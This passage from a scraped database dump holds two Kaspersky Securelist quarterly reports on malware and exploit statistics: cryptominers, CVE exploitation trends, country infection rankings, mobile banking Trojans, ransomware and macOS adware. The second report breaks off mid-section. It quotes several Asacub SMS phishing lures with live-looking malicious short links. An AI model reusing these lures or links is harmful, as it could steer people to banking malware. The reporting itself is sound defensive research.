by the long-familiar cryptors Shade, Crysis, Purgen, Cryakl etc.\n\n### Cryptominers\n\nAs we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is shrinking progressively, and cryptocurrency miners is starting to take its place. Therefore, this year we decided to begin to publish quarterly reports on the situation around type of threats. Simultaneously, we began to use a broader range of verdicts as a basis for collecting statistics on miners, so the Q2 statistics may not be consistent with the data from our earlier publications. It includes both stealth miners which we detect as Trojans, and those which are issued the verdict 'Riskware not-a-virus'_._\n\n#### **Number of new modifications**\n\nIn Q2 2018, Kaspersky Lab solutions detected 13,948 new modifications of miners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175945/180803-it-threat-evolution-q2-2018-statistics-16.png>)\n\n_Number of new miner modifications, Q2 2018_\n\n#### **Number of users attacked by cryptominers **\n\nIn Q2, we detected attacks involving mining programs on the computers of 2,243,581 Kaspersky Lab users around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175951/180803-it-threat-evolution-q2-2018-statistics-17.png>)\n\n_Number of unique users attacked by cryptominers, Q2 2018_\n\nIn April and May, the number of attacked users stayed roughly equal, and in June there was a modest decrease in cryptominers' activity.\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-18.png>)\n\n_Geography of cryptominer attacks, Q2 2018_\n\n#### **TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Ethiopia | 17.84 \n2 | Afghanistan | 16.21 \n3 | Uzbekistan | 14.18 \n4 | Kazakhstan | 11.40 \n5 | Belarus | 10.47 \n6 | Indonesia | 10.33 \n7 | Mozambique | 9.92 \n8 | Vietnam | 9.13 \n9 | Mongolia | 9.01 \n10 | Ukraine | 8.58 \n \n_*Excluded are countries with relatively few Kaspersky Lab' product users (under 50,000). \n** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nIn Q2 2018, we again observed some major changes in the distribution of platforms most often targeted by exploits. The share of Microsoft Office exploits (67%) doubled compared to Q1 (and quadrupled compared with the average for 2017). Such a sharp growth was driven primarily by massive spam messages distributing documents containing an exploit to the vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This stack overflow-type vulnerability in the old, deprecated Equation Editor component existed in all versions of Microsoft Office released over the last 18 years. The exploit still works stably in all possible combinations of the Microsoft Office package and Microsoft Windows. On the other hand, it allows the use of various obfuscations for bypassing the protection. These two factors made this vulnerability the most popular tool in cybercriminals' hands in Q2. The shares of other Microsoft Office vulnerabilities did no undergo much change since Q1.\n\nQ2 KSN statistics also showed a growing number of Adobe Flash exploits exploited via Microsoft Office. Despite Adobe and Microsoft's efforts to obstruct exploitation of Flash Player, a new 0-day exploit [CVE-2018-5002](<http://blogs.360.cn/blog/cve-2018-5002-en/>) was discovered in Q2. It propagated in an XLSX file and used a little-known technique allowing the exploit to be downloaded from a remote source rather than carried in the document body. Shockwave Flash (SWF) files, like many other file formats, are rendered in Microsoft Office documents in the OLE (Object Linking and Embedding) format. In the case of a SWF file, the OLE object contains the actual file and a list of various properties, one of which points to the path to the SWF file. The OLE object in the discovered exploit did not contain an SWF file in it, but only carried a list of properties including a web link to the SWF file, which forced Microsoft Office to download the missing file from the provided link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-19.png>)\n\n_Distribution of exploits used in cybercriminals' attacks by types of attacked applications, Q2 2018_\n\nIn late March 2018, a PDF document was detected at VirusTotal that contained two 0-day vulnerabilities: [CVE-2018-4990](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) and [CVE-2018-8120](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120>). The former allowed for execution of shellcode from JavaScript via exploitation of a software error in JPEG2000 format image processor in Acrobat Reader. The latter existed in the win32k function [SetImeInfoEx](<https://cloudblogs.microsoft.com/microsoftsecure/2018/07/02/taking-apart-a-double-zero-day-sample-discovered-in-joint-hunt-with-eset/>) and was used for further privilege escalation up to SYSTEM level and enabled the PDF viewer to escape the sandbox. Ana analysis of the document and our statistics show that at the moment of uploading to VirusTotal, this exploit was at the development stage and was not used for in-the-wild attacks.\n\nIn late April, Kaspersky Lab experts using an in-house sandbox have found the 0-day vulnerability [CVE-2018-8174](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) in Internet Explorer and reported it to Microsoft. An exploit to this vulnerability used a technique associated with [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) (launching an HTA script from a remote source via a specially crafted OLE object) to exploit a vulnerable Internet Explorer component with the help of Microsoft Office. We are observing that exploit pack creators have already taken this vulnerability on board and actively distribute exploits to it both via web sites and emails containing malicious documents.\n\nAlso in Q2, we observed a growing number of network attacks. There is a growing share of attempts to exploit the vulnerabilities patched with the security update MS17-010; these make up a majority a of the detected network attacks.\n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the second quarter of 2018, Kaspersky Lab solutions blocked 962,947,023 attacks launched from web resources located in 187 countries around the world. 351,913,075 unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175958/180803-it-threat-evolution-q2-2018-statistics-20.png>)\n\n_Distribution of web attack sources by country, Q2 2018_\n\nIn Q2, the TOP 4 of web attack source countries remain unchanged. The US (45.87%) was home to most sources of web attacks. The Netherlands (25.74%) came second by a large margin, Germany (5.33%) was third. There was a change in the fifth position: Russia (1.98%) has displaced the UK, although its share has decreased by 0.55 p.p.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the _Malware class_; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 33.49 \n2 | Albania | 30.27 \n3 | Algeria | 30.08 \n4 | Armenia | 29.98 \n5 | Ukraine | 29.68 \n6 | Moldova | 29.49 \n7 | Venezuela | 29.12 \n8 | Greece | 29.11 \n9 | Kyrgyzstan | 27.25 \n10 | Kazakhstan | 26.97 \n11 | Russia | 26.93 \n12 | Uzbekistan | 26.30 \n13 | Azerbaijan | 26.12 \n14 | Serbia | 25.23 \n15 | Qatar | 24.51 \n16 | Latvia | 24.40 \n17 | Vietnam | 24.03 \n18 | Georgia | 23.87 \n19 | Philippines | 23.85 \n20 | Romania | 23.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175858/180803-it-threat-evolution-q2-2018-statistics-21.png>)\n\n_Geography of malicious web attacks in Q2 2018 (percentage of attacked users)_\n\nOn average, 19.59% of Internet user computers worldwide experienced at least one Malware-class web attack.\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2018, our File Anti-Virus detected 192,053,604 malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only _Malware-class_ attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Uzbekistan | 51.01 \n2 | Afghanistan | 49.57 \n3 | Tajikistan | 46.21 \n4 | Yemen | 45.52 \n5 | Ethiopia | 43.64 \n6 | Turkmenistan | 43.52 \n7 | Vietnam | 42.56 \n8 | Kyrgyzstan | 41.34 \n9 | Rwanda | 40.88 \n10 | Mongolia | 40.71 \n11 | Algeria | 40.25 \n12 | Laos | 40.18 \n13 | Syria | 39.82 \n14 | Cameroon | 38.83 \n15 | Mozambique | 38.24 \n16 | Bangladesh | 37.57 \n17 | Sudan | 37.31 \n18 | Nepal | 37.02 \n19 | Zambia | 36.60 \n20 | Djibouti | 36.35 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives. \nExcluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-22.png>)\n\n_Geography of malicious web attacks in Q2 2018 (ranked by percentage of users attacked)_\n\nOn average, 19.58% of computers globally faced at least one Malware-class local threat in Q2.", "cvss3": {}, "published": "2018-08-06T10:00:04", "type": "securelist", "title": "IT threat evolution Q2 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-4990", "CVE-2018-5002", "CVE-2018-8120", "CVE-2018-8174"], "modified": "2018-08-06T10:00:04", "id": "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "href": "https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:14", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a \u0438 AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.\n\n## 